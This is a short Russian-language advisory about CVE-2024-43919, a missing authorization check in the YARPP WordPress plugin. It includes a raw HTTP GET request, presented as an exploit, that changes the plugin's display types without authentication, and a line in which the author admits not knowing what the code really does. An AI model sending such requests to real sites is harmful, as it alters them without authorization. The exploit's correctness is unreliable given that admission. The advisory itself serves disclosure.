
YARPP <= 5.30.10 - Отсутствие авторизации
YARPP <= 5.30.10 - Отсутствие авторизации
Плагин YARPP – Yet Another Related Posts Plugin для WordPress подвержен несанкционированному доступу из-за отсутствия проверки прав доступа в файле ~/includes/yarpp_pro_set_display_types.php во всех версиях до 5.30.10 включительно. Это позволяет неаутентифицированным злоумышленникам устанавливать типы отображения.
Type: plugin
CVSS Score: 5.3
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
CVE: CVE-2024-43919
Slug: yet-another-related-posts-plugin
Понятия не имею, что это на самом деле делает.
Вот пример сырого HTTP-запроса, эксплуатирующего уязвимость в плагине YARPP:
GET /wp-content/plugins/yet-another-related-posts-plugin/includes/yarpp_pro_set_display_types.php?ypsdt=false&types[]=post&types[]=page HTTP/1.1
Host: example.com
В этом запросе:
ypsdt установлен в false, чтобы обойти начальную проверку в коде.types[] используется для указания типов отображения. В данном примере передаются post и page.Host указывает целевой сайт WordPress, на котором установлен уязвимый плагин YARPP.Когда этот запрос отправляется на сайт WordPress с установленной уязвимой версией плагина YARPP, он установит типы отображения без необходимости какой-либо аутентификации или авторизации.